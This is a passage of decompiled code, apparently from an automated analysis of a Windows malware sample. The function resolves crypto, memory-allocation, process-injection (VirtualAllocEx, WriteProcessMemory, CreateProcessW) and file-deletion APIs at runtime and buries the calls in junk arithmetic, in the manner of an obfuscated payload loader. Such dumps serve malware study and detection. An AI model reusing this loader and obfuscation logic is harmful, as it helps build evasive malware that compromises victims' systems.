                                                								 *0x4feee0 = _t1355;
                                                							}
                                                							_t634 =  *0x4fef44; // 0x38993
                                                							 *0x4feef0 = _t634;
                                                							_push(_v12);
                                                							_t1401 =  *0x4feef0; // 0x44632301
                                                							_t1452 =  *0x4feef0; // 0x44632301
                                                							 *0x4feefc = E004EE798(_v28, _t1395, _t1401, _t1452, _t1564);
                                                							 *0x50590c = GetProcAddress(_v36, "CryptImportKey");
                                                							_v32 = 0;
                                                							if(_v32 >= 0xd) {
                                                								L36:
                                                								_t641 =  *0x4feea0; // 0xa1d900
                                                								 *0x4fef48 = _t641;
                                                								asm("fild dword [0x4feee0]");
                                                								E004FEED0 = E004048CC();
                                                								_t643 =  *0x4fef40; // 0x3c79b5d4
                                                								 *0x4feedc = _t643;
                                                								_t644 =  *0x4feee4; // 0x0
                                                								_v44 = _t644;
                                                								if(_v44 != 0) {
                                                									_v44 =  *((intOrPtr*)(_v44 - 4));
                                                								}
                                                								if(_v44 > 0xfe) {
                                                									 *0x4feefc =  *0x4fef28 * 0x91;
                                                								}
                                                								_t645 = E004FEF0C; // 0xb52124bf
                                                								_t1576 = _t645 -  *0x4feef0 - E004FEF0C; // 0xb52124bf
                                                								if(_t1576 >= 0) {
                                                									_t647 =  *0x4fef30; // 0xa1d816
                                                									__eflags = _t647 + E004FEF38 - E004FEF38; // 0xc3c34fdc
                                                									if(__eflags != 0) {
                                                										_push(_v12);
                                                										_t1453 = E004FEF34; // 0xc3c34ef0
                                                										E004EE798(_v16, _t1395, _v16, _t1453, __eflags);
                                                									} else {
                                                										_t1331 =  *0x4feecc; // 0xd26bafe0
                                                										_v60 = _t1331 + 4;
                                                										asm("fild dword [ebp-0x38]");
                                                										 *0x4feea0 = E004048D8();
                                                									}
                                                								} else {
                                                									_t1334 =  *0x4feef0; // 0x44632301
                                                									E004FEF20 = _t1334 + 4;
                                                								}
                                                								 *0x505910 = GetProcAddress(_v36, "CryptDecrypt");
                                                								 *0x505974 = GetProcAddress(_v36, "CryptCreateHash");
                                                								_t656 = E004FEF50; // 0xa3b3f6c0
                                                								E004FEF50 = E0040489C(_t656);
                                                								_t658 =  *0x4fef04; // 0x43c14963
                                                								 *0x4feecc = _t658;
                                                								_t659 =  *0x4feecc; // 0xd26bafe0
                                                								_t1577 = _t659 - E004FEF50; // 0xa3b3f6c0
                                                								if(_t1577 > 0) {
                                                									_t1324 =  *0x4fef4c; // 0x43c1493c
                                                									 *0x4feedc = _t1324;
                                                									_t1325 =  *0x4feee0; // 0x747938b
                                                									 *0x4feee0 = E0040489C(_t1325);
                                                									_v16 = _v24 * _v20;
                                                									_v12 = _v28 * _v32;
                                                								}
                                                								if(_v20 + _v16 < _v12 + _v20) {
                                                									_t1322 =  *0x4feee8; // 0xdcd0f434
                                                									 *0x4fef28 = _t1322 *  *0x4feee0;
                                                								}
                                                								_t662 = E004FEF34; // 0xc3c34ef0
                                                								E004FEF34 = E0040489C(_t662);
                                                								_t664 = E004FEF34; // 0xc3c34ef0
                                                								_t1581 = _t664 -  *0x4feee0; // 0x747938b
                                                								if(_t1581 >= 0) {
                                                									_t665 = E004FEED0; // 0xc3c34ef0
                                                									E004FEF20 = _t665;
                                                									_t666 =  *0x4feeec; // 0xb52124f2
                                                									E004FEF34 = _t666 + 0xa2;
                                                									_t668 = E004FEF00; // 0xa3b3f6c0
                                                									_t669 = _t668 - 0xa0;
                                                									__eflags = _t669;
                                                									 *0x4fef48 = _t669;
                                                								} else {
                                                									E00407640(_v8, L"SetLocaleInfoA");
                                                									if(_t1581 != 0) {
                                                										_t1318 =  *0x4feef0; // 0x44632301
                                                										 *0x4feefc = _t1318 +  *0x4feecc;
                                                									} else {
                                                										E00406CF4( &_v8, L"spwizeng.dll");
                                                									}
                                                								}
                                                								_t670 =  *0x4fef40; // 0x3c79b5d4
                                                								 *0x4feee0 = _t670 + 4;
                                                								_t672 =  *0x4feea0; // 0xa1d900
                                                								 *0x4feef4 = _t672 - 0x35;
                                                								 *0x505978 = GetProcAddress(_v36, "CryptHashData");
                                                								_t676 =  *0x4fef04; // 0x43c14963
                                                								_t1582 = _t676 + E004FEF38 - E004FEF38; // 0xc3c34fdc
                                                								if(_t1582 != 0) {
                                                									_t678 = _v20 * 0x9b;
                                                									__eflags = _t678;
                                                									_v16 = _t678;
                                                								} else {
                                                									_v32 = 0;
                                                									if(_v32 >= 4) {
                                                										L59:
                                                										_t679 =  *0x4fef44; // 0x38993
                                                										_v60 = _t679 + 4;
                                                										asm("fild dword [ebp-0x38]");
                                                										E004FEF0C = E004048D8();
                                                										_t682 =  *0x4fef14; // 0xb52124ca
                                                										 *0x4fef14 = _t682;
                                                										E00407678(_v8, 0, 1,  &_v8);
                                                										_t686 = E004FEF10; // 0x1cb931c0
                                                										E004FEF34 = _t686 + E004FEF2C;
                                                										if(_v28 - _v20 < _v28) {
                                                											_t1310 =  *0x4feedc; // 0xbc3e19a
                                                											_t1311 = _t1310 + 0xf1;
                                                											_t1586 = _t1311;
                                                											E004FEF50 = _t1311;
                                                										}
                                                										 *0x50597c = GetProcAddress(_v36, "CryptGetHashParam");
                                                										_v20 = _v28 + 4;
                                                										_v32 = _v12 + 0x4d;
                                                										_t696 =  *0x4feee8; // 0xdcd0f434
                                                										 *0x4fef30 = _t696 + 0x1d;
                                                										_t698 = E004FEF00; // 0xa3b3f6c0
                                                										 *0x4fef40 = _t698 + 4;
                                                										_t700 =  *0x4fef18; // 0xbc3e19a
                                                										_push(_t700);
                                                										 *0x4fef44 = E004EE798(_v28, _t1395, _v16, _v28, _t1586);
                                                										_t703 =  *0x4fef14; // 0xb52124ca
                                                										 *0x4feea0 = _t703;
                                                										 *0x505980 = GetProcAddress(_v36, "CryptDestroyHash");
                                                										_v20 = _v24 + 0x90;
                                                										_v16 = _v28 * _v32;
                                                										_t710 = E004FEF10; // 0x1cb931c0
                                                										E004FEF10 = E0040489C(_t710);
                                                										asm("fild dword [0x4fef4c]");
                                                										E004FEF2C = E004048CC();
                                                										_t713 = E004FEED0; // 0xc3c34ef0
                                                										 *0x4fef40 = _t713 +  *0x4fef18;
                                                										_t715 =  *0x4feeec; // 0xb52124f2
                                                										E004FEF50 = _t715 -  *0x4feeec;
                                                										 *0x505968 = GetProcAddress(_v36, "GetCurrentHwProfileW");
                                                										_v36 = GetModuleHandleW(L"kernel32.dll");
                                                										_v20 = _v28 * _v24;
                                                										_v12 = _v16 + _v32;
                                                										_t724 = E004FEF50; // 0xa3b3f6c0
                                                										E004FEF38 = _t724 *  *0x4fef3c;
                                                										_t726 =  *0x4feef4; // 0xb52124ca
                                                										 *0x4fef44 = _t726 *  *0x4feedc;
                                                										_t728 = E004FEF50; // 0xa3b3f6c0
                                                										 *0x4fef4c = _t728;
                                                										_t729 = E004FEF50; // 0xa3b3f6c0
                                                										_t1587 = _t729 + 0xd -  *0x4fef3c; // 0x1cb932a9
                                                										if(_t1587 < 0) {
                                                											E00406CF4( &_v8, L"EtwEventWriteStartScenario");
                                                										}
                                                										if(_v36 == 0) {
                                                											L189:
                                                											_v16 = _v32 + _v20;
                                                											_t733 =  *0x4fef28; // 0x3c79b5d4
                                                											_v60 = _t733 + 0x17;
                                                											asm("fild dword [ebp-0x38]");
                                                											 *0x4fef30 = E004048CC();
                                                											_t736 =  *0x4feef0; // 0x44632301
                                                											E004FEF38 = _t736;
                                                											_t737 =  *0x4feed8; // 0x1cb9338e
                                                											 *0x4fef3c = _t737;
                                                											_t738 = E004FEF38; // 0xc3c34fdc
                                                											_t1669 = _t738 -  *0x4fef3c; // 0x1cb932a9
                                                											if(_t1669 < 0) {
                                                												 *0x4feecc = 0x7a - E004FEF38;
                                                											}
                                                											_t739 = E004FEF00; // 0xa3b3f6c0
                                                											 *0x4feef0 = _t739 * E004FEF0C;
                                                											goto L192;
                                                										} else {
                                                											_v24 = _v28;
                                                											_t744 =  *0x4feefc; // 0x4b08dcc7
                                                											 *0x4fef3c = _t744;
                                                											_t745 =  *0x4fef14; // 0xb52124ca
                                                											_v60 = _t745 + 0x95;
                                                											asm("fild dword [ebp-0x38]");
                                                											 *0x4fef4c = E004048CC();
                                                											_t748 =  *0x4feea0; // 0xa1d900
                                                											_t1463 = E004FEF0C; // 0xb52124bf
                                                											_t1589 = _t748 +  *0x4feee0 - _t1463 +  *0x4feea0;
                                                											if(_t748 +  *0x4feee0 < _t1463 +  *0x4feea0) {
                                                												_push(_v28);
                                                												_t1306 =  *0x4fef14; // 0xb52124ca
                                                												 *0x4feee0 = E004EE798(_t1306, _t1395, _v24, _v12, _t1589);
                                                											}
                                                											_t750 =  *0x4feeec; // 0xb52124f2
                                                											 *0x4feeec = E0040489C(_t750);
                                                											_t752 =  *0x4feed8; // 0x1cb9338e
                                                											_v60 = _t752 + 0x2a;
                                                											asm("fild dword [ebp-0x38]");
                                                											E004FEF00 = E004048CC();
                                                											 *0x505948 = GetProcAddress(_v36, "VirtualAllocEx");
                                                											_v32 = 0;
                                                											if(_v32 >= 0xc) {
                                                												L71:
                                                												_t758 =  *0x4feefc; // 0x4b08dcc7
                                                												_push(_t758);
                                                												_t1405 =  *0x4fef3c; // 0x1cb932a9
                                                												_t1465 =  *0x4feed8; // 0x1cb9338e
                                                												_t759 =  *0x4fef14; // 0xb52124ca
                                                												 *0x4feef4 = E004EE798(_t759, _t1395, _t1405, _t1465, _t1592);
                                                												_t761 =  *0x4fef4c; // 0x43c1493c
                                                												 *0x4fef48 = _t761;
                                                												_t762 = E004FEF38; // 0xc3c34fdc
                                                												 *0x4fef4c = _t762;
                                                												_t763 =  *0x4feed8; // 0x1cb9338e
                                                												 *0x4feecc = _t763 + 0x4c;
                                                												_t765 =  *0x4fef30; // 0xa1d816
                                                												_push(_t765);
                                                												_t1466 = E004FEF38; // 0xc3c34fdc
                                                												_t766 =  *0x4feee0; // 0x747938b
                                                												 *0x4fef48 = E004EE798(_t766, _t1395, _v16, _t1466, _t1592);
                                                												 *0x50594c = GetProcAddress(_v36, "WriteProcessMemory");
                                                												 *0x50591c = GetProcAddress(_v36, "VirtualAlloc");
                                                												_t772 =  *0x4fef30; // 0xa1d816
                                                												_t1467 =  *0x4fef40; // 0x3c79b5d4
                                                												if(_t772 +  *0x4fef14 >= _t1467 +  *0x4fef30) {
                                                													_t774 = E004FEF34; // 0xc3c34ef0
                                                													__eflags = _t774 -  *0x4fef30 - E004FEF34; // 0xc3c34ef0
                                                													if(__eflags < 0) {
                                                														_t1272 =  *0x4feeec; // 0xb52124f2
                                                														_t1273 = _t1272 -  *0x4fef04;
                                                														__eflags = _t1273;
                                                														E004FEF50 = _t1273;
                                                													}
                                                													_t776 = E004FEF34; // 0xc3c34ef0
                                                													E004FEED0 = _t776;
                                                													_t777 =  *0x4fef48 * 0x91;
                                                													__eflags = _t777;
                                                													 *0x4feee8 = _t777;
                                                													_t778 =  *0x4feef4; // 0xb52124ca
                                                													 *0x4feef4 = E0040489C(_t778);
                                                													L83:
                                                													_t780 =  *0x4feee4; // 0x0
                                                													_v52 = _t780;
                                                													if(_v52 != 0) {
                                                														_v52 =  *((intOrPtr*)(_v52 - 4));
                                                													}
                                                													if(_v52 == 0x3f) {
                                                														_t1260 =  *0x4fef40; // 0x3c79b5d4
                                                														E004FEF20 = _t1260;
                                                														_t1261 =  *0x4fef14; // 0xb52124ca
                                                														E004FEF2C = _t1261;
                                                														_t1262 =  *0x4feee0; // 0x747938b
                                                														E004FEF34 = _t1262;
                                                														_t1263 = E004FEF34; // 0xc3c34ef0
                                                														_t1602 = _t1263 - E004FEF2C; // 0xa1d900
                                                														if(_t1602 < 0) {
                                                															_t1267 =  *0x4fef3c; // 0x1cb932a9
                                                															E004FEF50 = _t1267 +  *0x4feefc;
                                                														}
                                                														_t1264 =  *0x4fef28; // 0x3c79b5d4
                                                														_v60 = _t1264 + 0xee;
                                                														asm("fild dword [ebp-0x38]");
                                                														 *0x4feee0 = E004048CC();
                                                													}
                                                													_t781 =  *0x4feed8; // 0x1cb9338e
                                                													 *0x4fef04 =  *0x4fef04 + _t781;
                                                													_t782 = E004FEED0; // 0xc3c34ef0
                                                													E004FEF10 = _t782;
                                                													_t783 = E004FEF10; // 0x1cb931c0
                                                													_t1605 = _t783 - E004FEF2C; // 0xa1d900
                                                													if(_t1605 >= 0) {
                                                														asm("fild dword [0x4feee0]");
                                                														 *0x4feea0 = E004048CC();
                                                													} else {
                                                														_t1258 =  *0x4fef48; // 0xc3c34ef0
                                                														 *0x4fef30 = _t1258 - 0x4f;
                                                													}
                                                													_t785 =  *0x4feea0; // 0xa1d900
                                                													 *0x4feeec = _t785 *  *0x4feea0;
                                                													 *0x4fef04 = 0x7b - E004FEF50;
                                                													 *0x505920 = GetProcAddress(_v36, "VirtualFree");
                                                													_t791 = E004FEF50; // 0xa3b3f6c0
                                                													E004FEF50 = E0040489C(_t791);
                                                													_t793 = E004FEF34; // 0xc3c34ef0
                                                													 *0x4feea0 = _t793;
                                                													_t794 =  *0x4feea0; // 0xa1d900
                                                													_t1606 = _t794 - E004FEF50; // 0xa3b3f6c0
                                                													if(_t1606 <= 0) {
                                                														__eflags = 0xa6 - E004FEF38 - 0xd3;
                                                														if(0xa6 - E004FEF38 < 0xd3) {
                                                															_t1239 =  *0x4feec4; // 0x0
                                                															_v56 = _t1239;
                                                															__eflags = _v56;
                                                															if(_v56 != 0) {
                                                																_t1244 = _v56 - 4;
                                                																__eflags = _t1244;
                                                																_v56 =  *_t1244;
                                                															}
                                                															__eflags = _v56 - 0x32;
                                                															if(__eflags > 0) {
                                                																_push(_v32);
                                                																_t1434 =  *0x4feefc; // 0x4b08dcc7
                                                																_t1516 = E004FEF0C; // 0xb52124bf
                                                																_t1241 = E004FEF10; // 0x1cb931c0
                                                																 *0x4fef28 = E004EE798(_t1241, _t1395, _t1434, _t1516, __eflags);
                                                															}
                                                														}
                                                													} else {
                                                														_push(_v12);
                                                														E004EE798(_v16, _t1395, _v16, _v28, _t1606);
                                                														_t1249 =  *0x4feefc; // 0x4b08dcc7
                                                														_push(_t1249);
                                                														_t1250 =  *0x4feeec; // 0xb52124f2
                                                														E004EE798(_t1250, _t1395, _v24, _v24, _t1606);
                                                														_v16 = _v20 + 0xbb;
                                                														_t1254 =  *0x4feea0; // 0xa1d900
                                                														 *0x4fef14 = _t1254 +  *0x4feea0;
                                                														_t1256 =  *0x4feedc; // 0xbc3e19a
                                                														E004FEF2C = _t1256 - E004FEF34;
                                                													}
                                                													_t797 =  *0x4feee8; // 0xdcd0f434
                                                													E004FEF20 = _t797 *  *0x4fef28;
                                                													E00406CF4( &_v8, L"CNBJOP78.DLL");
                                                													_t801 =  *0x4feefc; // 0x4b08dcc7
                                                													E004FEF34 = _t801;
                                                													_t802 =  *0x4fef30; // 0xa1d816
                                                													 *0x4fef44 = _t802 +  *0x4fef30;
                                                													_t804 =  *0x4feefc; // 0x4b08dcc7
                                                													 *0x4fef4c = _t804;
                                                													 *0x505924 = GetProcAddress(_v36, "VirtualProtect");
                                                													_v20 = _v24 + _v32;
                                                													_t809 = E004FEF10; // 0x1cb931c0
                                                													_t1607 = _t809 -  *0x4fef14 - E004FEF10; // 0x1cb931c0
                                                													if(_t1607 < 0) {
                                                														E004FEF34 =  *0x4fef48 * 0xbf;
                                                													}
                                                													_t811 = E004FEF34; // 0xc3c34ef0
                                                													E004FEF50 = _t811 + 0x89;
                                                													 *0x4feee0 =  *0x4fef14 * 0x54;
                                                													_t814 =  *0x4fef14; // 0xb52124ca
                                                													E004FEF00 = _t814 * E004FEED0;
                                                													 *0x505928 = GetProcAddress(_v36, "LoadLibraryA");
                                                													 *0x50592c = GetProcAddress(_v36, "FreeLibrary");
                                                													 *0x505930 = GetProcAddress(_v36, "HeapFree");
                                                													E00407678(_v8, 0, 1,  &_v8);
                                                													E00406CF4( &_v8, L"ZwClearEvent");
                                                													_v12 = 0;
                                                													do {
                                                														_v16 = _v32 * _v20;
                                                														_v12 = _v12 + 1;
                                                													} while (_v12 != 7);
                                                													_t830 =  *0x4feefc; // 0x4b08dcc7
                                                													_t1611 = _t830 + 0xe9 -  *0x4feee8; // 0xdcd0f434
                                                													if(_t1611 >= 0) {
                                                														__eflags = _v28 - _v28 - _v28;
                                                														if(_v28 - _v28 >= _v28) {
                                                															_t834 =  *0x4feedc; // 0xbc3e19a
                                                															 *0x4feedc = E0040489C(_t834);
                                                														} else {
                                                															E004FEF50 =  *0x4fef40 * 0xe;
                                                														}
                                                													} else {
                                                														_t1236 =  *0x4fef44; // 0x38993
                                                														E004FEF20 = _t1236 + 0x45;
                                                													}
                                                													_t836 =  *0x4feef0; // 0x44632301
                                                													E004FEF0C = _t836 +  *0x4fef28;
                                                													_t838 =  *0x4fef4c; // 0x43c1493c
                                                													 *0x4fef14 = _t838;
                                                													 *0x505934 = GetProcAddress(_v36, "GetProcessHeap");
                                                													_v32 = 0;
                                                													_t1612 = _v32 - 0xe;
                                                													if(_v32 < 0xe) {
                                                														_v32 = _v32 + 1;
                                                														E00407678(_v8, 0, 1,  &_v8);
                                                														asm("fild dword [ebp-0x10]");
                                                														_v12 = E004048D8();
                                                													}
                                                													_t842 = E004FEF50; // 0xa3b3f6c0
                                                													 *0x4fef04 = _t842 - 0x65;
                                                													E00407678(_v8, 0, 1,  &_v8);
                                                													_t847 =  *0x4fef3c; // 0x1cb932a9
                                                													_v60 = _t847 + 4;
                                                													asm("fild dword [ebp-0x38]");
                                                													 *0x4fef28 = E004048D8();
                                                													_t850 =  *0x4fef4c; // 0x43c1493c
                                                													 *0x4fef3c = _t850 -  *0x4feef4;
                                                													_t852 = E004FEED0; // 0xc3c34ef0
                                                													 *0x4fef4c = _t852 *  *0x4feecc;
                                                													 *0x505938 = GetProcAddress(_v36, "GetNativeSystemInfo");
                                                													_v20 = _v32 + _v24;
                                                													_v28 = _v12 * 0xe3;
                                                													_t859 =  *0x4feef0; // 0x44632301
                                                													 *0x4feee8 = _t859 - 0x20;
                                                													 *0x4feefc =  *0x4fef04 * 0x1e;
                                                													_push(_v16);
                                                													_t1409 = E004FEF34; // 0xc3c34ef0
                                                													_t1478 =  *0x4fef18; // 0xbc3e19a
                                                													 *0x4feee0 = E004EE798(_v32, _t1395, _t1409, _t1478, _t1612);
                                                													_t865 = E004FEF34; // 0xc3c34ef0
                                                													E004FEF10 = _t865;
                                                													 *0x50593c = GetProcAddress(_v36, "IsBadReadPtr");
                                                													 *0x505940 = GetProcAddress(_v36, "GetProcAddress");
                                                													E00406CF4( &_v8, L"InvalidateRect");
                                                													_v12 = 0;
                                                													do {
                                                														_v60 = _v32 + 4;
                                                														asm("fild dword [ebp-0x38]");
                                                														_v16 = E004048D8();
                                                														_v12 = _v12 + 1;
                                                													} while (_v12 != 9);
                                                													_t876 =  *0x4feef4; // 0xb52124ca
                                                													 *0x4feef4 = _t876;
                                                													_v20 = 0;
                                                													if(_v20 < 2) {
                                                														_v20 = _v20 + 1;
                                                														_t1227 =  *0x4feecc; // 0xd26bafe0
                                                														 *0x4fef28 = _t1227 *  *0x4fef28;
                                                														_t1229 = E004FEF20; // 0x6e687a1a
                                                														 *0x4fef3c = _t1229 + 4;
                                                													}
                                                													_t878 =  *0x4fef3c; // 0x1cb932a9
                                                													_t1616 = _t878 + E004FEF50 - E004FEF50; // 0xa3b3f6c0
                                                													if(_t1616 == 0) {
                                                														E00406CF4( &_v8, _v8);
                                                													}
                                                													_t880 = E004FEF00; // 0xa3b3f6c0
                                                													_v60 = _t880 + 4;
                                                													asm("fild dword [ebp-0x38]");
                                                													 *0x4feee8 = E004048D8();
                                                													 *0x505954 = GetProcAddress(_v36, "GetCurrentProcess");
                                                													_t885 =  *0x4feea0; // 0xa1d900
                                                													E004FEF2C = _t885;
                                                													_v28 = 0;
                                                													if(_v28 >= 0xd) {
                                                														L122:
                                                														_t887 =  *0x4fef30; // 0xa1d816
                                                														 *0x4fef3c = _t887;
                                                														asm("fild dword [0x4fef40]");
                                                														E004FEF50 = E004048D8();
                                                														E00406CF4( &_v8, _v8);
                                                														 *0x505950 = GetProcAddress(_v36, "ReadProcessMemory");
                                                														_v20 = _v32 - 0xa1;
                                                														_v24 = _v12 * 0xca;
                                                														_t896 = E004FEF38; // 0xc3c34fdc
                                                														E004FEF34 = _t896 -  *0x4fef44;
                                                														_t898 =  *0x4fef48; // 0xc3c34ef0
                                                														_v60 = _t898 + 4;
                                                														asm("fild dword [ebp-0x38]");
                                                														 *0x4fef44 = E004048D8();
                                                														_t901 =  *0x4fef18; // 0xbc3e19a
                                                														 *0x4fef4c = _t901;
                                                														E00406CF4( &_v8, _v8);
                                                														 *0x505970 = GetProcAddress(_v36, "GetWindowsDirectoryW");
                                                														asm("fild dword [ebp-0x14]");
                                                														_v16 = E004048D8();
                                                														_push(_v24);
                                                														_t908 = E004FEF34; // 0xc3c34ef0
                                                														 *0x4fef48 = E004EE798(_t908, _t1395, _v24, _v20, _t1621);
                                                														_t910 = E004FEF10; // 0x1cb931c0
                                                														E004FEF10 = E0040489C(_t910);
                                                														_v60 = _v32 + 4;
                                                														asm("fild dword [ebp-0x38]");
                                                														_v28 = E004048D8();
                                                														if(_v24 + _v28 <= _v28) {
                                                															_push(_v28);
                                                															_t1411 = E004FEF50; // 0xa3b3f6c0
                                                															_t918 = E004FEF34; // 0xc3c34ef0
                                                															E004EE798(_t918, _t1395, _t1411, _v32, __eflags);
                                                														} else {
                                                															_t1215 =  *0x4fef30; // 0xa1d816
                                                															_t1623 = _t1215 + 0xbb - E004FEF0C; // 0xb52124bf
                                                															if(_t1623 < 0) {
                                                																_t1217 =  *0x4feed8; // 0x1cb9338e
                                                																 *0x4fef4c = _t1217 *  *0x4feee0;
                                                															}
                                                														}
                                                														_t920 =  *0x4fef48; // 0xc3c34ef0
                                                														 *0x4feefc = _t920 +  *0x4fef28;
                                                														 *0x50596c = GetProcAddress(_v36, "GetShortPathNameW");
                                                														 *0x505984 = GetProcAddress(_v36, "CreateProcessW");
                                                														_v32 = 0;
                                                														do {
                                                															_t927 = E004FEF34; // 0xc3c34ef0
                                                															E004FEF2C = _t927;
                                                															_t928 =  *0x4fef48; // 0xc3c34ef0
                                                															 *0x4fef40 = _t928 + E004FEF2C;
                                                															_t930 =  *0x4fef18; // 0xbc3e19a
                                                															 *0x4fef48 = _t930;
                                                															_v32 = _v32 + 1;
                                                														} while (_v32 != 0xe);
                                                														_t931 =  *0x4fef14; // 0xb52124ca
                                                														E004FEED0 = _t931 + 0x35;
                                                														_t933 = E004FEF10; // 0x1cb931c0
                                                														 *0x4feef0 = _t933 + E004FEF0C;
                                                														_t935 =  *0x4feef4; // 0xb52124ca
                                                														 *0x4feef4 = _t935;
                                                														_t936 = E004FEF10; // 0x1cb931c0
                                                														_v60 = _t936 + 4;
                                                														asm("fild dword [ebp-0x38]");
                                                														E004FEF0C = E004048D8();
                                                														_t939 =  *0x4fef14; // 0xb52124ca
                                                														 *0x4fef14 = E0040489C(_t939);
                                                														 *0x505988 = GetProcAddress(_v36, "GetTempPathW");
                                                														_v32 = 0;
                                                														_t944 = E004FEF38; // 0xc3c34fdc
                                                														E004FEF50 = _t944;
                                                														_t945 = E004FEF20; // 0x6e687a1a
                                                														 *0x4feea0 = _t945;
                                                														_t946 =  *0x4feea0; // 0xa1d900
                                                														_t1626 = _t946 - E004FEF50; // 0xa3b3f6c0
                                                														if(_t1626 > 0) {
                                                															_push(_v24);
                                                															E004EE798(_v12, _t1395, _v12, _v28, _t1626);
                                                														}
                                                														if(0x62 - _v20 >= 0x2a) {
                                                															__eflags = 0xf1;
                                                															E004FEF34 = 0xf1 - E004FEF2C;
                                                														} else {
                                                															_v20 = _v16 - 0x5a;
                                                														}
                                                														_t951 =  *0x4fef3c; // 0x1cb932a9
                                                														 *0x4fef44 = _t951;
                                                														_t952 =  *0x4feea0; // 0xa1d900
                                                														_t1628 = _t952 -  *0x4fef44; // 0x38993
                                                														if(_t1628 >= 0) {
                                                															_t953 = E004FEED0; // 0xc3c34ef0
                                                															E004FEF00 = _t953;
                                                														} else {
                                                															E00407640(_v8, L"System.ComponentModel.DataAnnotations.ni.dll");
                                                															if(_t1628 == 0) {
                                                																_t1207 = E004FEF10; // 0x1cb931c0
                                                																_push(_t1207);
                                                																_t1510 =  *0x4fef28; // 0x3c79b5d4
                                                																_t1208 =  *0x4feee0; // 0x747938b
                                                																E004EE798(_t1208, _t1395, _v32, _t1510, _t1628);
                                                															}
                                                														}
                                                														_t954 = E004FEF34; // 0xc3c34ef0
                                                														_push(_t954);
                                                														_t1484 =  *0x4fef30; // 0xa1d816
                                                														_t955 =  *0x4fef4c; // 0x43c1493c
                                                														E004EE798(_t955, _t1395, _v32, _t1484, _t1628);
                                                														asm("fild dword [0x4fef18]");
                                                														E004FEF2C = E004048CC();
                                                														_t958 =  *0x4fef30; // 0xa1d816
                                                														 *0x4fef3c = _t958 +  *0x4feed8;
                                                														 *0x5058fc = GetProcAddress(_v36, "SetFileAttributesW");
                                                														_v20 = _v28 - 0xad;
                                                														_v24 = _v16 - 0x73;
                                                														_t966 =  *0x4feef0; // 0x44632301
                                                														 *0x4fef28 = _t966 + 4;
                                                														_t968 =  *0x4fef04; // 0x43c14963
                                                														 *0x4fef3c = _t968 + 0x42;
                                                														 *0x4fef4c = 0x40 -  *0x4fef18;
                                                														_t972 = E004FEF34; // 0xc3c34ef0
                                                														 *0x4feed8 = _t972 + 0x3e;
                                                														 *0x4fee94 = GetProcAddress(_v36, "DeleteFileW");
                                                														 *0x4fee9c = GetProcAddress(_v36, "ReadFile");
                                                														 *0x4feea4 = GetProcAddress(_v36, "WriteFile");
                                                														if(_v32 - _v16 == _v28) {
                                                															_t1197 = E004FEF50; // 0xa3b3f6c0
                                                															 *0x4fef3c = _t1197;
                                                															_t1198 =  *0x4fef28; // 0x3c79b5d4
                                                															 *0x4fef44 = _t1198;
                                                															_t1199 =  *0x4fef3c; // 0x1cb932a9
                                                															_t1630 = _t1199 -  *0x4fef44; // 0x38993
                                                															if(_t1630 < 0) {
                                                																_t1201 = E00407774(L"ipconfig.exe", 1, _v8);
                                                																_t1631 = _t1201 - 0xfa;
                                                																if(_t1201 == 0xfa) {
                                                																	_t1203 = _v12 - 0xdc;
                                                																	__eflags = _t1203;
                                                																	_v20 = _t1203;
                                                																} else {
                                                																	_v16 = _v32 * 0xcd;
                                                																}
                                                															}
                                                														}
                                                														asm("fild dword [0x4fef14]");
                                                														 *0x4fef3c = E004048D8();
                                                														_t983 =  *0x4fef40; // 0x3c79b5d4
                                                														 *0x4fef48 = _t983;
                                                														_t984 =  *0x4feea0; // 0xa1d900
                                                														E004FEED0 = _t984 +  *0x4fef28;
                                                														 *0x4feeac = GetProcAddress(_v36, "CloseHandle");
                                                														_v20 = _v32 + 0x26;
                                                														_t990 = E004FEF20; // 0x6e687a1a
                                                														 *0x4fef14 = _t990;
                                                														_v24 = 0x15 - _v16;
                                                														_t993 =  *0x4feeec; // 0xb52124f2
                                                														E004FEF38 = _t993 + 0x23;
                                                														_t995 =  *0x4feef4; // 0xb52124ca
                                                														_push(_t995);
                                                														_t1413 =  *0x4fef4c; // 0x43c1493c
                                                														_t1485 =  *0x4feed8; // 0x1cb9338e
                                                														_t996 =  *0x4fef3c; // 0x1cb932a9
                                                														E004FEF0C = E004EE798(_t996, _t1395, _t1413, _t1485, _t1631);
                                                														_t998 =  *0x4feecc; // 0xd26bafe0
                                                														E004FEF50 = _t998 -  *0x4fef18;
                                                														 *0x4feeb4 = GetProcAddress(_v36, "CreateFileW");
                                                														_v20 = _v28 + 0x3f;
                                                														_v12 = 0;
                                                														if(_v12 >= 0xa) {
                                                															L144:
                                                															asm("fild dword [0x4fef04]");
                                                															 *0x4feea0 = E004048D8();
                                                															_push(_v28);
                                                															_t1486 =  *0x4feee8; // 0xdcd0f434
                                                															E004FEF38 = E004EE798(_v12, _t1395, _v12, _t1486, _t1633);
                                                															 *0x4feeec =  *0x4feeec + 0xe0;
                                                															_t1009 =  *0x4fef48; // 0xc3c34ef0
                                                															 *0x4feef4 = _t1009;
                                                															_v36 = GetModuleHandleW(L"ntdll.dll");
                                                															if(_v36 == 0) {
                                                																L179:
                                                																asm("fild dword [ebp-0x1c]");
                                                																_v24 = E004048D8();
                                                																_v12 = 0;
                                                																if(_v12 >= 0xf) {
                                                																	L186:
                                                																	_t1013 = E004FEED0; // 0xc3c34ef0
                                                																	E004FEED0 = E0040489C(_t1013);
                                                																	_t1015 =  *0x4fef3c; // 0x1cb932a9
                                                																	 *0x4feee0 = _t1015 *  *0x4fef18;
                                                																	_t1488 =  *0x4feec0; // 0x0
                                                																	if(E00407774(L"AppLaunch.exe", 1, _t1488) != 0xea) {
                                                																		 *0x4fef18 = E004FEF38 * 0xbd;
                                                																	}
                                                																	_t1019 =  *0x4fef18; // 0xbc3e19a
                                                																	_v60 = _t1019 + 4;
                                                																	asm("fild dword [ebp-0x38]");
                                                																	 *0x4fef3c = E004048D8();
                                                																	goto L189;
                                                																} else {
                                                																	goto L180;
                                                																}
                                                																do {
                                                																	L180:
                                                																	_v12 = _v12 + 1;
                                                																	_t1023 =  *0x4fef3c; // 0x1cb932a9
                                                																	E004FEF34 = _t1023;
                                                																	_t1024 = E004FEF38; // 0xc3c34fdc
                                                																	E004FEF38 = E0040489C(_t1024);
                                                																	_t1026 = E004FEF34; // 0xc3c34ef0
                                                																	_t1660 = _t1026 - E004FEF38; // 0xc3c34fdc
                                                																	if(_t1660 >= 0) {
                                                																		L183:
                                                																		_v16 = 0;
                                                																		if(_v16 >= 0xe) {
                                                																			goto L185;
                                                																		} else {
                                                																			goto L184;
                                                																		}
                                                																		do {
                                                																			L184:
                                                																			_v16 = _v16 + 1;
